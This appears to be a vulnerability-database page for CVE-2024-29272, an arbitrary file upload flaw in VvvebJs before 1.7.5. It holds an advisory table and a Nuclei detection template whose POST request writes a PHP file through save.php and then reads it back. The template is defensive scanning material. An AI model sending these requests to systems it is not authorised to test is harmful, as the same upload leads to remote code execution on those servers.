| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Vvveb Vvvebjs | 25 Mar 202422:43 | – | githubexploit | |
| VvvebJs 安全漏洞 | 22 Mar 202400:00 | – | cnnvd | |
| CVE-2024-29272 | 22 Mar 202400:00 | – | cve | |
| CVE-2024-29272 | 22 Mar 202400:00 | – | cvelist | |
| VvvebJs Arbitrary File Upload vulnerability | 22 Mar 202406:30 | – | github | |
| CVE-2024-29272 | 22 Mar 202404:15 | – | nvd | |
| GHSA-PMM3-68Q9-57JG VvvebJs Arbitrary File Upload vulnerability | 22 Mar 202406:30 | – | osv | |
| PT-2024-22844 · Vvvebjs · Vvvebjs | 21 Mar 202400:00 | – | ptsecurity | |
| CVE-2024-29272 | 23 May 202508:55 | – | redhatcve | |
| CVE-2024-29272 | 22 Mar 202400:00 | – | vulnrichment |
id: CVE-2024-29272
info:
name: VvvebJs < 1.7.5 - Arbitrary File Upload
author: s4e-io
severity: medium
description: |
Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.
impact: |
Attackers can upload malicious files to the server, potentially leading to remote code execution.
remediation: |
Update VvvebJs to version 1.7.5 or later.
reference:
- https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/
- https://github.com/givanz/VvvebJs/issues/343
- https://nvd.nist.gov/vuln/detail/CVE-2024-29272
- https://vuldb.com/?id.257680
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2024-29272
cwe-id: CWE-434
epss-score: 0.09366
epss-percentile: 0.94793
cpe: cpe:2.3:a:vvvebjs:vvvebjs:1.7.4:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: vvvebjs
product: vvvebjs
fofa-query: icon_hash="524332373"
tags: cve,cve2024,file-upload,intrusive,vuln
variables:
num: "{{rand_int(1000, 9999)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
file=demo/landing/index.php&html={{md5(num)}}
matchers:
- type: dsl
dsl:
- 'contains(body,"File saved")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /demo/landing/index.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"{{md5(num)}}")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502204b451ebf51de0a6034c725babe812f229b27d00c0d9ce991e3948b03a88ae0a7022100c1657a0916cf887421b8ffe1802113223fb1893a3416bb22e24c4c1332f59cc3:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation